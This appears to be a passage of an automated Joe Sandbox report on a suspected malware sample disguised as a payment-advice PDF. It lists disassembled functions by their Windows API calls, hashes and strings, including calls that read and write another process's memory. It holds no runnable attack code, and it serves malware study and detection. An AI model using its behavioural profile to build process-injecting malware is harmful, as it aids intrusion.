                                                              • API String ID: 2983881199-0
                                                              • Opcode ID: 3e44712e7a258dbb55dda64088d8910190b13bdf1b52650a5913f2eef2829aba
                                                              • Instruction ID: a51a9b723ea6a5caf4ee19f18b532de04fe0a35f9d3ab4ecd289f33d719e79cd
                                                              • Opcode Fuzzy Hash: 3e44712e7a258dbb55dda64088d8910190b13bdf1b52650a5913f2eef2829aba
                                                              • Instruction Fuzzy Hash: 9821C531700208ABDF10AE698C85EAE7BADFB58710F085029FE85D73D1E6B08D45A792
                                                              APIs
                                                              • IsWindow.USER32(00000000), ref: 008B5A6E
                                                              • GetForegroundWindow.USER32 ref: 008B5A85
                                                              • GetDC.USER32(00000000), ref: 008B5AC1
                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 008B5ACD
                                                              • ReleaseDC.USER32(00000000,00000003), ref: 008B5B08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$ForegroundPixelRelease
                                                              • String ID:
                                                              • API String ID: 4156661090-0
                                                              • Opcode ID: b1f7193a06636ec4ee8ad73c60d314c28fdb1c7115fa049f6e941828ce673faa
                                                              • Instruction ID: 540e717720a21ed2a812ccbb6aeeb55141ae6ea66699c499e02cdf16c056854b
                                                              • Opcode Fuzzy Hash: b1f7193a06636ec4ee8ad73c60d314c28fdb1c7115fa049f6e941828ce673faa
                                                              • Instruction Fuzzy Hash: 85216F75A00118AFE714EF69D884E9ABBF5FF49310F148479F949D7362DA30AD00CB91
                                                              APIs
                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0084134D
                                                              • SelectObject.GDI32(?,00000000), ref: 0084135C
                                                              • BeginPath.GDI32(?), ref: 00841373
                                                              • SelectObject.GDI32(?,00000000), ref: 0084139C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$BeginCreatePath
                                                              • String ID:
                                                              • API String ID: 3225163088-0
                                                              • Opcode ID: f8dcc0f8ff4223a954963dcdadb07d753927234b575a8a526ce0c558b2c12d61
                                                              • Instruction ID: 83c89977ffdf5bf015af95d56990b731b0fb08d7ed762b2f4ace5ea17ae0ef6f
                                                              • Opcode Fuzzy Hash: f8dcc0f8ff4223a954963dcdadb07d753927234b575a8a526ce0c558b2c12d61
                                                              • Instruction Fuzzy Hash: 21213630814A0CEFDF11CF25EC48B6A7BA9FB00B65F198226EC14962B1D77499D1EF90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memcmp
                                                              • String ID:
                                                              • API String ID: 2931989736-0
                                                              • Opcode ID: 199f6ec1e95c249c9b8ecc2b8628ce6c9180f1613a492253a218be85731685b5
                                                              • Instruction ID: 2071f4132c97ad7c6686dc6c3893c1254ca80423d832e24ce90ce4382794c797
                                                              • Opcode Fuzzy Hash: 199f6ec1e95c249c9b8ecc2b8628ce6c9180f1613a492253a218be85731685b5
                                                              • Instruction Fuzzy Hash: 0E0169A26001096AEA047A15AE42FBBA35DFF6039CF0C4422FD15DB342EB64EE1082A5
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 008A4ABA
                                                              • __beginthreadex.LIBCMT ref: 008A4AD8
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 008A4AED
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008A4B03
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008A4B0A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                              • String ID:
                                                              • API String ID: 3824534824-0
                                                              • Opcode ID: 0b28d7da7ff4f013d554fd4543834f383c2f392a47cfed66d540cdd5ce8a29cd
                                                              • Instruction ID: 6bb3f46f31cf221a97aa286e47bf45287f0c7d421ec986aabfae59bd6b2e1208
                                                              • Opcode Fuzzy Hash: 0b28d7da7ff4f013d554fd4543834f383c2f392a47cfed66d540cdd5ce8a29cd
                                                              • Instruction Fuzzy Hash: A8110876908618BFEB018FAC9C04E9B7FAEFB85320F154266F924D3351D6B1C9008BB0
                                                              APIs
                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0089821E
                                                              • GetLastError.KERNEL32(?,00897CE2,?,?,?), ref: 00898228
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00897CE2,?,?,?), ref: 00898237
                                                              • HeapAlloc.KERNEL32(00000000,?,00897CE2,?,?,?), ref: 0089823E
                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00898255
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 842720411-0
                                                              • Opcode ID: 84593695c236763e1baf482c64c47fc173958e64907ef404813fc3abb7763f37
                                                              • Instruction ID: 288cbcbf7561b6758c0e8b6ed6c75b3bf6b246d2eb9ea67b22c49d41c4d5b7b8
                                                              • Opcode Fuzzy Hash: 84593695c236763e1baf482c64c47fc173958e64907ef404813fc3abb7763f37
                                                              • Instruction Fuzzy Hash: 79014671200605FFEB205FA6DC48D6B7FBEFF8A755B54042AF909C3220DA318C00DA60
                                                              APIs
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?,?,00897455), ref: 00897127
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?), ref: 00897142
                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?), ref: 00897150
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?), ref: 00897160
                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00897044,80070057,?,?), ref: 0089716C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              • Opcode ID: faff347ef61719c37cbe6aa9a0666ca48c5ecefd6f6b1b11be54d2e16a92a86f
                                                              • Instruction ID: 3fd85857b183b07460ed54e112fcc57b1ec339e45dd5b569ad46895d8a6d2a7d
                                                              • Opcode Fuzzy Hash: faff347ef61719c37cbe6aa9a0666ca48c5ecefd6f6b1b11be54d2e16a92a86f
                                                              • Instruction Fuzzy Hash: 13017C72621208BFEB115F64DC44EAA7BBEFB48792F180078FE04D2221E731DD419BA0
                                                              APIs
                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A5260
                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008A526E
                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A5276
                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008A5280
                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A52BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                              • String ID:
                                                              • API String ID: 2833360925-0
                                                              • Opcode ID: 887d84ecf624827000a7c8cc3332931d62f663f117d5411908e65782e1729f5c
                                                              • Instruction ID: 9298823a788b653f940ba1a6dd2641699f86e0e3325216209d53bd5b4e449365
                                                              • Opcode Fuzzy Hash: 887d84ecf624827000a7c8cc3332931d62f663f117d5411908e65782e1729f5c
                                                              • Instruction Fuzzy Hash: BF012931D01A1DDBEF00EFE4E849AEDBB79FB0A711F450156EA45F2642CB30959487A1
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00898121
                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0089812B
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0089813A
                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00898141
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00898157
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 0d81165dbdc2924776375dcade0d330d480b7f33e7cad73b50a1cabcd1a38c03
                                                              • Instruction ID: 81343c578fbffb72ac0094ba830b96d20d26ab122eccdf0fb887b885e295a929
                                                              • Opcode Fuzzy Hash: 0d81165dbdc2924776375dcade0d330d480b7f33e7cad73b50a1cabcd1a38c03
                                                              • Instruction Fuzzy Hash: 9AF04F71200305EFEB121FA5EC88E6B3BBDFF4AB54B040026FA45C6151CB719941DA60
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0089C1F7
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0089C20E
                                                              • MessageBeep.USER32(00000000), ref: 0089C226
                                                              • KillTimer.USER32(?,0000040A), ref: 0089C242
                                                              • EndDialog.USER32(?,00000001), ref: 0089C25C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: fff42141d6541164c0cf8a88128a70d06cb41db7cd0cf9ee72ed4106ad7885e0
                                                              • Instruction ID: dc2a28e794163f1229c92a3938b55bec73d840272d46e78c8c86441e263f17f6
                                                              • Opcode Fuzzy Hash: fff42141d6541164c0cf8a88128a70d06cb41db7cd0cf9ee72ed4106ad7885e0
                                                              • Instruction Fuzzy Hash: 5A01D630404308ABFF246BA4ED4EF9677B9FF10B06F044669F682E14E2DBF169449B90
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 008413BF
                                                              • StrokeAndFillPath.GDI32(?,?,0087B888,00000000,?), ref: 008413DB
                                                              • SelectObject.GDI32(?,00000000), ref: 008413EE
                                                              • DeleteObject.GDI32 ref: 00841401
                                                              • StrokePath.GDI32(?), ref: 0084141C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              • Opcode ID: acb05b5e5cb1c5d4f23932faefe3c7d0ff87f4855724a029bbb712a460e655a5
                                                              • Instruction ID: af084accf5813947c752398922598bd98ee09303c1969016d2a7fb307a85c6e4
                                                              • Opcode Fuzzy Hash: acb05b5e5cb1c5d4f23932faefe3c7d0ff87f4855724a029bbb712a460e655a5
                                                              • Instruction Fuzzy Hash: 70F0F630018B08EFEB115F66EC4CB593BA6F700B26F09C224ED69880B2C7348995EF10
                                                              APIs
                                                                • Part of subcall function 00860DB6: std::exception::exception.LIBCMT ref: 00860DEC
                                                                • Part of subcall function 00860DB6: __CxxThrowException@8.LIBCMT ref: 00860E01
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 00847A51: _memmove.LIBCMT ref: 00847AAB
                                                              • __swprintf.LIBCMT ref: 00852ECD
                                                              Strings
                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00852D66
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                              • API String ID: 1943609520-557222456
                                                              • Opcode ID: 186d238e2957a31bc5920524e4eda36f9084c2a7087c2c663523cb1476c8668d
                                                              • Instruction ID: 073da85e2b2e99883485a91004a3786fc2073629639cf33176d7e4b2e35f4602
                                                              • Opcode Fuzzy Hash: 186d238e2957a31bc5920524e4eda36f9084c2a7087c2c663523cb1476c8668d
                                                              • Instruction Fuzzy Hash: 39917A711082159FC714EF28C886C6FBBA9FF95724F00091DF895DB2A2EB20ED48CB52
                                                              APIs
                                                                • Part of subcall function 00844750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00844743,?,?,008437AE,?), ref: 00844770
                                                              • CoInitialize.OLE32(00000000), ref: 008AB9BB
                                                              • CoCreateInstance.OLE32(008D2D6C,00000000,00000001,008D2BDC,?), ref: 008AB9D4
                                                              • CoUninitialize.OLE32 ref: 008AB9F1
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                              • String ID: .lnk
                                                              • API String ID: 2126378814-24824748
                                                              • Opcode ID: 90fd08fea68ce299543f391817acb1544eb5dbcda1e670cbd70b4b84000e501c
                                                              • Instruction ID: de40d836ee4a12c8f0a64ab32d06da9079427e8910a287ccf7eb664bfc350351
                                                              • Opcode Fuzzy Hash: 90fd08fea68ce299543f391817acb1544eb5dbcda1e670cbd70b4b84000e501c
                                                              • Instruction Fuzzy Hash: 2EA135756042059FDB10DF18C484D6ABBE5FF8A324F048959F89ADB362CB31EC46CB92
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 008650AD
                                                                • Part of subcall function 008700F0: __87except.LIBCMT ref: 0087012B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__87except__start
                                                              • String ID: pow
                                                              • API String ID: 2905807303-2276729525
                                                              • Opcode ID: 1e44dab39b2b570542bbd3b6ba61cb59c65195c4489fc117a61389940cd21bcc
                                                              • Instruction ID: 9d5f715d95b2ae03ad7b61cfebb16c6b254ec230713211da4cc92932206929da
                                                              • Opcode Fuzzy Hash: 1e44dab39b2b570542bbd3b6ba61cb59c65195c4489fc117a61389940cd21bcc
                                                              • Instruction Fuzzy Hash: 4051592191CA06D6DB12B728C95137E3B94FB41714F24CA5AE4D9C62AEEF34CDC49E83
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memset$_memmove
                                                              • String ID: ERCP
                                                              • API String ID: 2532777613-1384759551
                                                              • Opcode ID: ad33bada139cc6c7b7d1f8b7f8b9a6cbecdd1b7054b7ccdbd2917b9bdd665c2b
                                                              • Instruction ID: 6338ab6d62264243af7f6644cce02a45ecbd0b520189080d34237b36f91a7ee6
                                                              • Opcode Fuzzy Hash: ad33bada139cc6c7b7d1f8b7f8b9a6cbecdd1b7054b7ccdbd2917b9bdd665c2b
                                                              • Instruction Fuzzy Hash: B751BF70900709DFDB24DFA5C881BAAB7E4FF04315F64456EE94ACB251E770AA58CB40
                                                              APIs
                                                                • Part of subcall function 008A14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00899296,?,?,00000034,00000800,?,00000034), ref: 008A14E6
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0089983F
                                                                • Part of subcall function 008A1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008992C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008A14B1
                                                                • Part of subcall function 008A13DE: GetWindowThreadProcessId.USER32(?,?), ref: 008A1409
                                                                • Part of subcall function 008A13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0089925A,00000034,?,?,00001004,00000000,00000000), ref: 008A1419
                                                                • Part of subcall function 008A13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0089925A,00000034,?,?,00001004,00000000,00000000), ref: 008A142F
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008998AC
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008998F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
                                                              • Opcode ID: 36cd2b2a5a2e6cdbc53fe937c238ac5f6f1d33655dbf025c80442f72f06cd3dd
                                                              • Instruction ID: 19158e84bbd303906f8938f43ea6405539220ad928f9dc93ece6146ab48cf640
                                                              • Opcode Fuzzy Hash: 36cd2b2a5a2e6cdbc53fe937c238ac5f6f1d33655dbf025c80442f72f06cd3dd
                                                              • Instruction Fuzzy Hash: DF415076901118AFDF10DFA8CC45EDEBBB8FB09300F044059FA85B7541DA706E45CBA1
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,008CF910,00000000,?,?,?,?), ref: 008C79DF
                                                              • GetWindowLongW.USER32 ref: 008C79FC
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008C7A0C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: bcf425b81f194a4929742561dca18a810b252840712ac0d9221502273977dce4
